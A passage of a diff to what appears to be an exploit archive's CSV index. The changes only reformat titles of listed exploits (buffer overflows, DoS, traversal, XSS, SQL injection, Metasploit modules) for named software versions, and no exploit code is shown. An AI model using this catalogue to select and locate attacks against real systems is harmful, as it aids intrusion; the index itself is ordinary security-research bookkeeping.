wmcdplay 1.0 beta1-2 - Buffer Overflow (2)",2000-03-13,"Larry W. Cashdolla",linux,local,0 19804,platforms/linux/local/19804.pl,"AT Computing atsar_linux 1.4 - File Manipulation",2000-03-11,"S. Krahmer",linux,local,0 19805,platforms/windows/remote/19805.txt,"GameHouse dldisplay ActiveX control 0_Real Server 5.0/7.0 Internal IP Address Disclosure",2000-03-08,tschweikle,windows,remote,0 19806,platforms/windows/dos/19806.c,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (1)",2000-03-14,"Ussr Labs",windows,dos,0 @@ -17194,15 +17194,15 @@ id,file,description,date,author,platform,type,port 19832,platforms/hardware/remote/19832.rb,"Siemens Simatic S7-300 PLC Remote Memory Viewer (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,8080 19833,platforms/hardware/remote/19833.rb,"Siemens Simatic S7-1200 CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,0 19834,platforms/windows/dos/19834.txt,"Real Networks RealPlayer 6/7 Location Buffer Overflow",2000-04-03,"Adam Muntner",windows,dos,0 -19835,platforms/windows/dos/19835.txt,"SalesLogix Corporation eViewer 1.0 DoS",2000-03-31,"Todd Beebe",windows,dos,0 +19835,platforms/windows/dos/19835.txt,"SalesLogix Corporation eViewer 1.0 - DoS",2000-03-31,"Todd Beebe",windows,dos,0 19836,platforms/windows/local/19836.c,"Symantec pcAnywhere 9.0 Weak Encryption",2000-04-06,"Pascal Longpre",windows,local,0 19837,platforms/linux/local/19837.c,"Bray Systems Linux Trustees 1.5 Long Pathname",2000-04-10,"Andrey E. Lerman",linux,local,0 19838,platforms/linux/local/19838.c,"CRYPTOCard CRYPTOAdmin 4.1 - Weak Encryption (1)",2000-04-10,kingpin,linux,local,0 19839,platforms/windows/local/19839.txt,"CRYPTOCard CRYPTOAdmin 4.1 - Weak Encryption (2)",2000-04-10,kingpin,windows,local,0 -19840,platforms/beos/local/19840.txt,"Be BeOS 4.5/5.0 Invalid System Call",2000-04-10,"Konstantin Boldyshev",beos,local,0 +19840,platforms/beos/local/19840.txt,"Be BeOS 4.5/5.0 - Invalid System Call",2000-04-10,"Konstantin Boldyshev",beos,local,0 19841,platforms/beos/local/19841.casl,"Be BeOS 4.0/4.5/5.0 IP Packet Length Field",2000-04-07,"Tim Newsham",beos,local,0 19842,platforms/cgi/remote/19842.txt,"TalentSoft Web+ 4.x - Directory Traversal",2000-04-12,"John P. McNeely",cgi,remote,0 -19843,platforms/windows/dos/19843.java,"AVM KEN! 1.3.10/1.4.30 Malformed Request Remote DoS",2000-04-12,eAX,windows,dos,0 +19843,platforms/windows/dos/19843.java,"AVM KEN! 1.3.10/1.4.30 - Malformed Request Remote DoS",2000-04-12,eAX,windows,dos,0 19844,platforms/cgi/remote/19844.txt,"CNC Technology BizDB 1.0 bizdb-search.cgi Remote Command Execution",2000-04-13,"PErfecto Technology",cgi,remote,0 19845,platforms/windows/remote/19845.pl,"Microsoft FrontPage 98 Server Extensions for IIS_Microsoft InterDev 1.0 - Filename Obfuscation",2000-04-14,"rain forest puppy",windows,remote,0 19846,platforms/windows/remote/19846.pl,"Microsoft FrontPage 98 Server Extensions for IIS_Microsoft InterDev 1.0 - Buffer Overflow",2000-04-14,"Richie & Beto",windows,remote,0 @@ -17215,7 +17215,7 @@ id,file,description,date,author,platform,type,port 19853,platforms/windows/dos/19853.txt,"FrontPage 97/98 Server Image Mapper Buffer Overflow",2000-04-19,Narrow,windows,dos,0 19854,platforms/netware/dos/19854.sh,"Novell Netware 5.1 - Remote Administration Buffer Overflow",2000-04-19,"Michal Zalewski",netware,dos,0 19855,platforms/windows/local/19855.txt,"Panda Security 3.0 - Multiple Vulnerabilities",2000-04-17,Zan,windows,local,0 -19856,platforms/windows/dos/19856.txt,"GameHouse dldisplay ActiveX control 0_Real Server 7.0 Port 7070 DoS",2000-04-20,"Ussr Labs",windows,dos,7070 +19856,platforms/windows/dos/19856.txt,"GameHouse dldisplay ActiveX control 0_Real Server 7.0 Port 7070 - DoS",2000-04-20,"Ussr Labs",windows,dos,7070 19857,platforms/windows/remote/19857.rb,"ALLMediaServer 0.8 - Buffer Overflow",2012-07-16,Metasploit,windows,remote,888 19905,platforms/unix/remote/19905.pl,"John Donoghue Knapster 0.9/1.3.8 - File Access",2000-05-13,no_maam,unix,remote,0 19904,platforms/unix/local/19904.txt,"Intel Corporation NetStructure 7110 Undocumented Password",2000-05-08,"Stake Inc",unix,local,0 @@ -17257,13 +17257,13 @@ id,file,description,date,author,platform,type,port 19896,platforms/bsd/dos/19896.c,"FreeBSD 3.4/4.0/5.0 / NetBSD 1.4 - Unaligned IP Option Denial of Service",2000-05-04,y3t1,bsd,dos,0 19897,platforms/windows/remote/19897.txt,"FrontPage 2000_IIS 4.0/5.0 Server Extensions Path Disclosure",2000-05-06,"Frankie Zie",windows,remote,0 19898,platforms/php/webapps/19898.txt,"Forum Oxalis 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",php,webapps,0 -19899,platforms/cgi/dos/19899.txt,"UltraBoard 1.6 DoS",2000-05-05,"Juan M. Bello Rivas",cgi,dos,0 +19899,platforms/cgi/dos/19899.txt,"UltraBoard 1.6 - DoS",2000-05-05,"Juan M. Bello Rivas",cgi,dos,0 19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 pam_console",2000-05-03,"Michal Zalewski",linux,local,0 19901,platforms/hardware/remote/19901.txt,"Netopia R-series routers 4.6.2",2000-05-16,"Stephen Friedl",hardware,remote,0 20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - (products_map.php symb parameter) XSS",2012-07-21,muts,php,webapps,0 19906,platforms/multiple/remote/19906.txt,"Matt Wright FormMail 1.6/1.7/1.8 Environmental Variables Disclosure",2000-05-10,"Black Watch Labs",multiple,remote,0 -19907,platforms/windows/dos/19907.txt,"Microsoft IIS 4.0/5.0 Malformed File Extension DoS",2000-05-11,"Ussr Labs",windows,dos,0 -19908,platforms/windows/remote/19908.txt,"Microsoft IIS 4.0/5.0 Malformed Filename Request",2000-05-11,"Cerberus Security Team",windows,remote,0 +19907,platforms/windows/dos/19907.txt,"Microsoft IIS 4.0/5.0 - Malformed File Extension DoS",2000-05-11,"Ussr Labs",windows,dos,0 +19908,platforms/windows/remote/19908.txt,"Microsoft IIS 4.0/5.0 - Malformed Filename Request",2000-05-11,"Cerberus Security Team",windows,remote,0 19909,platforms/cgi/remote/19909.pl,"Mozilla Bugzilla 2.4/2.6/2.8/2.10 - Remote Arbitrary Command Execution",2000-05-11,"Frank van Vliet karin",cgi,remote,0 19910,platforms/solaris/local/19910.c,"Solaris 2.6/7.0/8 netpr Buffer Overflow (1)",1999-05-23,ADM,solaris,local,0 19911,platforms/solaris/local/19911.c,"Solaris 2.6/7.0/8 netpr Buffer Overflow (2)",1999-03-04,ADM,solaris,local,0 @@ -17293,8 +17293,8 @@ id,file,description,date,author,platform,type,port 19937,platforms/windows/remote/19937.pl,"Simple Web Server 2.2 rc2 - Remote Buffer Overflow Exploit",2012-07-19,mr.pr0n,windows,remote,0 19938,platforms/beos/dos/19938.txt,"BeOS 5.0 TCP Fragmentation Remote DoS",2000-05-18,visi0n,beos,dos,0 19939,platforms/windows/remote/19939.html,"Microsoft Internet Explorer 4.0/5.0/5.5 preview/5.0.1 - DocumentComplete() Cross Frame Access",2000-05-17,"Andrew Nosenko",windows,remote,0 -19940,platforms/windows/dos/19940.c,"Axent NetProwler 3.0 Malformed IP Packets DoS (1)",2000-05-18,"rain forest puppy",windows,dos,0 -19941,platforms/windows/dos/19941.casl,"Axent NetProwler 3.0 Malformed IP Packets DoS (2)",2000-05-18,"Pedro Quintanilha",windows,dos,0 +19940,platforms/windows/dos/19940.c,"Axent NetProwler 3.0 - Malformed IP Packets DoS (1)",2000-05-18,"rain forest puppy",windows,dos,0 +19941,platforms/windows/dos/19941.casl,"Axent NetProwler 3.0 - Malformed IP Packets DoS (2)",2000-05-18,"Pedro Quintanilha",windows,dos,0 19942,platforms/windows/remote/19942.txt,"Fortech Proxy+ 2.30 - Remote Administration",1999-12-26,anonymous,windows,remote,0 19943,platforms/hardware/remote/19943.txt,"Intel Corporation Express 8100 ISDN Router Fragmented ICMP",1990-05-19,"Dimuthu Parussalla",hardware,remote,0 19944,platforms/multiple/remote/19944.pl,"Lotus Domino Enterprise Server 5.0.1/5.0.2/5.0.3_Mail Server 5.0.1/5.0.2/5.0.3 - Buffer Overflow",2000-05-18,smiler,multiple,remote,0 @@ -17355,7 +17355,7 @@ id,file,description,date,author,platform,type,port 20004,platforms/linux/local/20004.c,"Stelian Pop dump 0.4 restore Buffer Overflow",2000-06-07,"Stan Bubrouski",linux,local,0 20005,platforms/windows/dos/20005.c,"Windows NT 4.0 - Remote Registry Request DoS (1)",2000-06-08,"Renaud Deraison",windows,dos,0 20006,platforms/windows/dos/20006.nasl,"Windows NT 4.0 - Remote Registry Request DoS (2)",2000-06-08,"Renaud Deraison",windows,dos,0 -20007,platforms/cgi/remote/20007.c,"3R Soft MailStudio 2000 2.0 userreg.cgi Arbitrary Command Execution",2000-04-24,fygrave,cgi,remote,0 +20007,platforms/cgi/remote/20007.c,"3R Soft MailStudio 2000 2.0 - userreg.cgi Arbitrary Command Execution",2000-04-24,fygrave,cgi,remote,0 20008,platforms/cgi/remote/20008.txt,"3R Soft MailStudio 2000 2.0 - Arbitrary File Access",2000-06-09,s0ftpr0ject,cgi,remote,0 20009,platforms/linux/remote/20009.py,"atmail email server appliance 6.4 - Stored XSS / CSRF / RCE",2012-07-21,muts,linux,remote,0 20011,platforms/windows/webapps/20011.js,"solarwinds orion network performance monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0 @@ -17385,7 +17385,7 @@ id,file,description,date,author,platform,type,port 20036,platforms/windows/local/20036.pl,"Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow Exploit",2012-07-23,mr.pr0n,windows,local,0 20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0 20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - (blocked.php id parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0 -20039,platforms/windows/dos/20039.java,"LeafDigital LeafChat 1.7 DoS",2000-06-25,"MDMA Crew",windows,dos,0 +20039,platforms/windows/dos/20039.java,"LeafDigital LeafChat 1.7 - DoS",2000-06-25,"MDMA Crew",windows,dos,0 20040,platforms/windows/remote/20040.c,"SapporoWorks WinProxy 2.0/2.0.1 - Buffer Overflow",2000-06-27,UNYUN,windows,remote,0 20041,platforms/cgi/remote/20041.txt,"Flowerfire Sawmill 5.0.21 - File Access",2000-06-26,"Larry W. Cashdollar",cgi,remote,0 20042,platforms/unix/local/20042.c,"Flowerfire Sawmill 5.0.21 - Weak Password Encryption",2000-06-26,"Larry W. Cashdollar",unix,local,0 @@ -17401,7 +17401,7 @@ id,file,description,date,author,platform,type,port 20052,platforms/multiple/dos/20052.txt,"Centrinity FirstClass 5.77 - Intranet Server Long Header Denial of Service",2000-06-27,"Adam Prime",multiple,dos,0 20053,platforms/windows/local/20053.py,"MyMp3 Player Stack .m3u DEP Bypass Exploit",2012-07-23,"Daniel Romero",windows,local,0 20054,platforms/windows/dos/20054.pl,"West Street Software LocalWEB HTTP Server 1.2 - Buffer Overflow",2000-07-04,"Ussr Labs",windows,dos,0 -20055,platforms/php/webapps/20055.txt,"MySQL Squid Access Report 2.1.4 HTML Injection",2012-07-23,"Daniel Godoy",php,webapps,0 +20055,platforms/php/webapps/20055.txt,"MySQL Squid Access Report 2.1.4 - HTML Injection",2012-07-23,"Daniel Godoy",php,webapps,0 20056,platforms/unix/local/20056.c,"Visible Systems Razor 4.1 Password File (1)",2000-06-16,pbw,unix,local,0 20058,platforms/unix/local/20058.pl,"Visible Systems Razor 4.1 Password File (2)",2000-06-15,"Shawn A. Clifford",unix,local,0 20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 Internal Variable Override",2000-07-04,"Adrian Daminato",cgi,remote,0 @@ -17425,7 +17425,7 @@ id,file,description,date,author,platform,type,port 20077,platforms/linux/remote/20077.c,"Conectiva 4.x/5.x_Debian 2.x_RedHat 6.x_S.u.S.E 6.x/7.0_Trustix 1.x - rpc.statd Remote Format String (3)",2000-08-03,ron1n,linux,remote,0 20078,platforms/windows/remote/20078.pl,"Microsoft Outlook 97/98/2000_ Outlook Express 4.0/5.0 GMT Field Buffer Overflow (1)",2000-07-18,"Ussr Labs",windows,remote,0 20079,platforms/windows/remote/20079.txt,"Microsoft Outlook 97/98/2000_ Outlook Express 4.0/5.0 GMT Field Buffer Overflow (2)",2000-07-18,"Ussr Labs",windows,remote,0 -20080,platforms/windows/dos/20080.c,"Computer Software Manufaktur Alibaba 2.0 DoS",2000-07-18,wildcoyote,windows,dos,0 +20080,platforms/windows/dos/20080.c,"Computer Software Manufaktur Alibaba 2.0 - DoS",2000-07-18,wildcoyote,windows,dos,0 20081,platforms/windows/local/20081.c,"NetZero ZeroPort 3.0 Weak Encryption Method",2000-07-18,"Brian Carrier",windows,local,0 20082,platforms/unix/remote/20082.txt,"University of Washington pop2d 4.46/4.51/4.54/4.55 - Remote File Read",2000-07-14,mandark,unix,remote,0 20083,platforms/php/webapps/20083.txt,"WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary PHP File Upload",2012-07-24,"Chris Kellum",php,webapps,0 @@ -17472,15 +17472,15 @@ id,file,description,date,author,platform,type,port 20133,platforms/windows/local/20133.cpp,"Microsoft Windows 2000 Named Pipes Predictability",2000-08-01,Maceo,windows,local,0 20134,platforms/windows/remote/20134.pl,"NAI Net Tools PKI Server 1.0 strong.exe Buffer Overflow",2000-08-02,juliano,windows,remote,0 20135,platforms/windows/remote/20135.txt,"nai net tools pki server 1.0 - Directory Traversal",2000-08-02,"Juliano Rizzo",windows,remote,0 -20136,platforms/windows/remote/20136.txt,"NAI Net Tools PKI Server 1.0 Format String",2000-08-02,"Juliano Rizzo",windows,remote,0 +20136,platforms/windows/remote/20136.txt,"NAI Net Tools PKI Server 1.0 - Format String",2000-08-02,"Juliano Rizzo",windows,remote,0 20137,platforms/irix/local/20137.c,"IRIX 6.2/6.3/6.4 - xfs truncate() Privilege Check",1997-02-01,"Last Stage of Delirium",irix,local,0 20138,platforms/irix/local/20138.c,"IRIX 5.3/6.x - mail",1997-09-01,"Last Stage of Delirium",irix,local,0 20139,platforms/multiple/remote/20139.txt,"Sun JDK 1.1.x_Sun JRE 1.1.x - Listening Socket",2000-08-03,"Alexey Yarovinsky",multiple,remote,0 20140,platforms/multiple/remote/20140.txt,"Netscape Communicator 4.x - URL Read",2000-08-03,"Dan Brumleve",multiple,remote,0 20141,platforms/linux/local/20141.pl,"Suidperl 5.00503 Mail Shell Escape (1)",2000-08-07,"Sebastian Krahmer",linux,local,0 20142,platforms/linux/local/20142.sh,"Suidperl 5.00503 Mail Shell Escape (2)",2000-08-07,"Michal Zalewski",linux,local,0 -20143,platforms/linux/remote/20143.txt,"Luca Deri ntop 1.2 a7-9 Unauthorized File Retrieval",2000-08-02,dubhe,linux,remote,0 -20144,platforms/solaris/remote/20144.txt,"Sun AnswerBook2 1.4.2/1.4.3/1.4.4 Administration Interface Access",2000-08-08,"Lluis Mora",solaris,remote,0 +20143,platforms/linux/remote/20143.txt,"Luca Deri ntop 1.2 a7-9 - Unauthorized File Retrieval",2000-08-02,dubhe,linux,remote,0 +20144,platforms/solaris/remote/20144.txt,"Sun AnswerBook2 1.4.2/1.4.3/1.4.4 - Administration Interface Access",2000-08-08,"Lluis Mora",solaris,remote,0 20146,platforms/solaris/remote/20146.txt,"Solaris AnswerBook2 - Remote Command Execution",2000-08-07,"Lluis Mora",solaris,remote,0 20147,platforms/solaris/local/20147.sh,"Tech-Source Raptor GFX PGX32 2.3.1 Config Tool",2000-08-02,suid,solaris,local,0 20148,platforms/windows/remote/20148.pl,"MediaHouse Software Statistics Server LiveStats 5.2 - Buffer Overflow",2000-08-10,Zan,windows,remote,0 @@ -17488,15 +17488,15 @@ id,file,description,date,author,platform,type,port 20150,platforms/unix/remote/20150.c,"Luca Deri ntop 1.2 a7-9/1.3.1 - Buffer Overflow",2000-08-14,anonymous,unix,remote,0 20151,platforms/windows/remote/20151.pl,"Microsoft IIS 5.0 - 'Translate: f' Source Disclosure (1)",2000-08-14,smiler,windows,remote,0 20152,platforms/windows/remote/20152.pl,"Microsoft IIS 5.0 - 'Translate: f' Source Disclosure (2)",2000-08-14,"Roelof Temmingh",windows,remote,0 -20153,platforms/unix/local/20153.c,"David Bagley xlock 4.16 User Supplied Format String (1)",2000-08-15,noir,unix,local,0 -20154,platforms/unix/local/20154.c,"David Bagley xlock 4.16 User Supplied Format String (2)",2000-10-21,"Ben Williams",unix,local,0 +20153,platforms/unix/local/20153.c,"David Bagley xlock 4.16 - User Supplied Format String (1)",2000-08-15,noir,unix,local,0 +20154,platforms/unix/local/20154.c,"David Bagley xlock 4.16 - User Supplied Format String (2)",2000-10-21,"Ben Williams",unix,local,0 20155,platforms/linux/local/20155.txt,"Multisoft FlagShip 4.4 Installation Permission",2000-08-10,Narrow,linux,local,0 20156,platforms/cgi/remote/20156.txt,"netwin netauth 4.2 - Directory Traversal",2000-08-17,"Marc Maiffret",cgi,remote,0 20157,platforms/linux/remote/20157.c,"UMN Gopherd 2.x - Halidate Function Buffer Overflow",2000-08-20,"Chris Sharp",linux,remote,0 20158,platforms/php/webapps/20158.txt,"PHP-Nuke 1.0/2.5 - Administrative Privileges",2000-08-21,bruj0,php,webapps,0 20159,platforms/linux/remote/20159.c,"Darxite 0.4 Login Buffer Overflow",2000-08-22,Scrippie,linux,remote,0 20160,platforms/linux/local/20160.txt,"Minicom 1.82/1.83 Capture-file Group Ownership",2000-08-19,"Michal Zalewski",linux,local,0 -20161,platforms/linux/remote/20161.txt,"X-Chat 1.2/1.3/1.4/1.5 Command Execution Via URLs",2000-08-17,"zenith parsec",linux,remote,0 +20161,platforms/linux/remote/20161.txt,"X-Chat 1.2/1.3/1.4/1.5 - Command Execution Via URLs",2000-08-17,"zenith parsec",linux,remote,0 20162,platforms/hp-ux/local/20162.txt,"HP-UX 11.0 net.init RC Script",2000-08-22,"Kyong-won Cho",hp-ux,local,0 20163,platforms/unix/remote/20163.c,"WorldView 6.5/Wnn4 4.2 Asian Language Server Remote Buffer Overflow",2000-03-08,UNYUN,unix,remote,0 20164,platforms/cgi/remote/20164.pl,"CGI Script Center Account Manager 1.0 LITE / PRO Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0 @@ -17510,9 +17510,9 @@ id,file,description,date,author,platform,type,port 20173,platforms/php/webapps/20173.rb,"WebPageTest Arbitrary PHP File Upload",2012-08-02,Metasploit,php,webapps,0 20174,platforms/windows/remote/20174.rb,"Microsoft Internet Explorer Fixed Table Col Span Heap Overflow",2012-08-02,Metasploit,windows,remote,0 20175,platforms/windows/dos/20175.pl,"PragmaSys TelnetServer 2000 rexec Buffer Overflow",2000-08-24,"Ussr Labs",windows,dos,0 -20176,platforms/cgi/remote/20176.pl,"CGI Script Center Subscribe Me Lite 2.0 Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0 -20177,platforms/cgi/remote/20177.html,"CGI Script Center Subscribe Me Lite 2.0 Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote,0 -20178,platforms/multiple/dos/20178.pl,"vqSoft vqServer 1.4.49 DoS",2000-08-19,sinfony,multiple,dos,0 +20176,platforms/cgi/remote/20176.pl,"CGI Script Center Subscribe Me Lite 2.0 - Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0 +20177,platforms/cgi/remote/20177.html,"CGI Script Center Subscribe Me Lite 2.0 - Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote,0 +20178,platforms/multiple/dos/20178.pl,"vqSoft vqServer 1.4.49 - DoS",2000-08-19,sinfony,multiple,dos,0 20179,platforms/unix/local/20179.txt,"Gert Doering mgetty 1.1.19/1.1.20/1.1.21/1.22.8 Symbolic Link Traversal",2000-08-25,"Stan Bubrouski",unix,local,0 20180,platforms/windows/remote/20180.c,"RobTex Viking Server 1.0.6 Build 355 - Buffer Overflow",2000-08-28,wildcoyote,windows,remote,0 20181,platforms/multiple/remote/20181.txt,"Kerberos 4 4.0/5 5.0 KDC Spoofing",2000-08-28,"Dug Song",multiple,remote,0 @@ -17525,7 +17525,7 @@ id,file,description,date,author,platform,type,port 20188,platforms/solaris/local/20188.c,"Solaris 2.6/7.0 - 'eject' locale subsystem Format String Exploit",2000-09-08,warning3,solaris,local,0 20189,platforms/unix/local/20189.c,"Libc locale - Exploit (1)",2000-09-04,Synnergy.net,unix,local,0 20190,platforms/unix/local/20190.c,"Libc locale - Exploit (2)",2000-09-04,anonymous,unix,local,0 -20191,platforms/bsd/local/20191.c,"Juergen Weigert screen 3.9 User Supplied Format String",2000-09-05,IhaQueR@IRCnet,bsd,local,0 +20191,platforms/bsd/local/20191.c,"Juergen Weigert screen 3.9 - User Supplied Format String",2000-09-05,IhaQueR@IRCnet,bsd,local,0 20192,platforms/unix/dos/20192.txt,"LPPlus 3.2.2/3.3 - Permissions DoS",2000-09-06,"Dixie Flatline",unix,dos,0 20193,platforms/unix/local/20193.txt,"LPPlus 3.2.2/3.3 - dccscan unprivileged read",2000-09-06,"Dixie Flatline",unix,local,0 20194,platforms/cgi/remote/20194.pl,"CGI Script Center Auction Weaver 1.0.2 - Remote Command Execution",2000-08-30,teleh0r,cgi,remote,0 @@ -17566,7 +17566,7 @@ id,file,description,date,author,platform,type,port 20230,platforms/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 - Local Root Compromise",2000-06-24,"Stephen J. Friedl",sco,local,0 20231,platforms/hardware/remote/20231.txt,"Cisco PIX Firewall 4.x/5.x - SMTP Content Filtering Evasion",2000-09-19,"Lincoln Yeoh",hardware,remote,0 20232,platforms/windows/local/20232.cpp,"Microsoft Windows 2000/NT 4 - DLL Search Path Weakness",2000-09-18,"Georgi Guninski",windows,local,0 -20233,platforms/windows/dos/20233.txt,"NetcPlus BrowseGate 2.80 DoS",2000-09-21,"Delphis Consulting",windows,dos,0 +20233,platforms/windows/dos/20233.txt,"NetcPlus BrowseGate 2.80 - DoS",2000-09-21,"Delphis Consulting",windows,dos,0 20234,platforms/multiple/remote/20234.txt,"extent technologies rbs isp 2.5 - Directory Traversal",2000-09-21,anon,multiple,remote,8002 20235,platforms/windows/remote/20235.pl,"Cisco Secure ACS for Windows NT 2.42 - Buffer Overflow",2000-09-21,blackangels,windows,remote,0 20236,platforms/linux/remote/20236.txt,"S.u.S.E. Linux 6.3/6.4 - Installed Package Disclosure",2000-09-21,t0maszek,linux,remote,0 @@ -17587,7 +17587,7 @@ id,file,description,date,author,platform,type,port 20251,platforms/linux/local/20251.c,"LBL traceroute 1.4 a5 Heap Corruption (2)",2000-09-28,"Perry Harrington",linux,local,0 20252,platforms/linux/local/20252.c,"LBL traceroute 1.4 a5 Heap Corruption (3)",2000-09-28,"Michel Kaempf",linux,local,0 20253,platforms/linux/remote/20253.sh,"OpenSSH 1.2 scp File Create/Overwrite",2000-09-30,"Michal Zalewski",linux,remote,0 -20254,platforms/windows/dos/20254.txt,"Microsoft Windows NT 4.0 Invalid LPC Request DoS",2000-10-03,"BindView's Razor Team",windows,dos,0 +20254,platforms/windows/dos/20254.txt,"Microsoft Windows NT 4.0 - Invalid LPC Request DoS",2000-10-03,"BindView's Razor Team",windows,dos,0 20255,platforms/windows/dos/20255.txt,"Microsoft Windows NT 4.0 / 2000 LPC Zone Memory Depletion DoS",2000-10-03,"BindView's Razor Team",windows,dos,0 20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x - fstat Format String",2000-10-04,K2,openbsd,local,0 20257,platforms/windows/local/20257.txt,"Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier - Multiple Vulnerabilities",2000-10-03,"BindView's Razor Team",windows,local,0 @@ -17610,16 +17610,16 @@ id,file,description,date,author,platform,type,port 20274,platforms/multiple/local/20274.pl,"IBM WebSphere 2.0/3.0 ikeyman Weak Encrypted Password",1999-10-24,"Ben Laurie",multiple,local,0 20275,platforms/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal - 'iplncal.sh' Permissions",2000-10-10,@stake,solaris,local,0 20276,platforms/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal 'csstart'",2000-10-10,@stake,solaris,local,0 -20277,platforms/cgi/remote/20277.txt,"Armada Design Master Index 1.0 Path Traversal",2000-07-18,pestilence,cgi,remote,0 +20277,platforms/cgi/remote/20277.txt,"Armada Design Master Index 1.0 - Path Traversal",2000-07-18,pestilence,cgi,remote,0 20278,platforms/php/webapps/20278.txt,"phpix 1.0 - Directory Traversal",2000-10-07,Synnergy.net,php,webapps,0 20279,platforms/cgi/remote/20279.txt,"extropia webstore 1.0/2.0 - Directory Traversal",2000-10-09,f0bic,cgi,remote,0 20280,platforms/cgi/remote/20280.txt,"bytes interactive Web shopper 1.0/2.0 - Directory Traversal",2000-10-08,f0bic,cgi,remote,0 20281,platforms/cgi/remote/20281.txt,"hassan consulting shopping cart 1.18 - Directory Traversal",2000-10-07,f0bic,cgi,remote,0 -20282,platforms/windows/dos/20282.pl,"Evolvable Shambala Server 4.5 DoS",2000-10-09,zillion,windows,dos,0 +20282,platforms/windows/dos/20282.pl,"Evolvable Shambala Server 4.5 - DoS",2000-10-09,zillion,windows,dos,0 20283,platforms/windows/remote/20283.txt,"Microsoft Windows 9x / Me Share Level Password Bypass (1)",2000-10-10,stickler,windows,remote,0 20284,platforms/windows/remote/20284.txt,"Microsoft Windows 9x / Me Share Level Password Bypass (2)",2000-10-10,"Gabriel Maggiotti",windows,remote,0 20285,platforms/linux/local/20285.c,"RedHat 6.2/7.0 Tmpwatch Arbitrary Command Execution",2000-10-06,X-Force,linux,local,0 -20286,platforms/php/remote/20286.c,"PHP 3.0/4.0 Error Logging Format String",2000-10-12,anonymous,php,remote,0 +20286,platforms/php/remote/20286.c,"PHP 3.0/4.0 - Error Logging Format String",2000-10-12,anonymous,php,remote,0 20287,platforms/windows/remote/20287.c,"Nevis Systems All-Mail 1.1 - Buffer Overflow",2000-10-10,@stake,windows,remote,0 20288,platforms/windows/remote/20288.c,"Microsoft Windows 9x File Handle Buffer Overflow",2000-07-10,Nsfocus,windows,remote,0 20289,platforms/windows/dos/20289.txt,"Microsoft NetMeeting 3.0.1 4.4.3385 - Remote Desktop Sharing DoS",2000-10-13,"Kirk Corey",windows,dos,0 @@ -17656,7 +17656,7 @@ id,file,description,date,author,platform,type,port 20324,platforms/windows/remote/20324.txt,"iPlanet Certificate Management System 4.2 - Directory Traversal",2000-10-25,CORE-SDI,windows,remote,0 20325,platforms/windows/remote/20325.txt,"Netscape Directory Server 4.12 - Directory Server Directory Traversal",2000-10-25,CORE-SDI,windows,remote,0 20326,platforms/unix/local/20326.sh,"ntop 1.x - i Local Format String",2000-10-18,"Paul Starzetz",unix,local,0 -20327,platforms/unix/remote/20327.txt,"GNU Ffingerd 1.19 Username Validity Disclosure",1999-08-23,"Eilon Gishri",unix,remote,0 +20327,platforms/unix/remote/20327.txt,"GNU Ffingerd 1.19 - Username Validity Disclosure",1999-08-23,"Eilon Gishri",unix,remote,0 20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service",2000-10-20,"Knud Erik Højgaard",hardware,dos,0 20329,platforms/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 crontab /tmp File",2000-10-20,"Kyong-won Cho",hp-ux,local,0 20330,platforms/hardware/remote/20330.pl,"Cisco Catalyst 3500 XL Remote Arbitrary Command Execution",2000-10-26,blackangels,hardware,remote,0 @@ -17684,7 +17684,7 @@ id,file,description,date,author,platform,type,port 20352,platforms/windows/webapps/20352.py,"afterlogic mailsuite pro (vmware appliance) 6.3 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20353,platforms/windows/webapps/20353.py,"mailtraq 2.17.3.3150 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20354,platforms/php/remote/20354.rb,"PHP IRC Bot pbot eval() Remote Code Execution",2012-08-08,Metasploit,php,remote,0 -20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential",2012-08-08,Metasploit,windows,remote,0 +20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 - Default MySQL Credential",2012-08-08,Metasploit,windows,remote,0 20356,platforms/windows/webapps/20356.py,"ManageEngine ServiceDesk Plus 8.1 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20357,platforms/windows/webapps/20357.py,"alt-n mdaemon free 12.5.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20358,platforms/php/webapps/20358.py,"WordPress mini mail dashboard widget 1.42 Plugin - Stored XSS",2012-08-08,loneferret,php,webapps,0 @@ -17725,7 +17725,7 @@ id,file,description,date,author,platform,type,port 20394,platforms/unix/remote/20394.c,"BNC 2.2.4/2.4.6/2.4.8 IRC Proxy Buffer Overflow (1)",1998-12-26,duke,unix,remote,0 20395,platforms/unix/remote/20395.c,"BNC 2.2.4/2.4.6/2.4.8 IRC Proxy Buffer Overflow (2)",1998-12-26,"jamez and dumped",unix,remote,0 20396,platforms/hp-ux/local/20396.sh,"HP-UX 10.x/11.x - Aserver PATH",1998-10-18,Loneguard,hp-ux,local,0 -20397,platforms/cgi/remote/20397.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 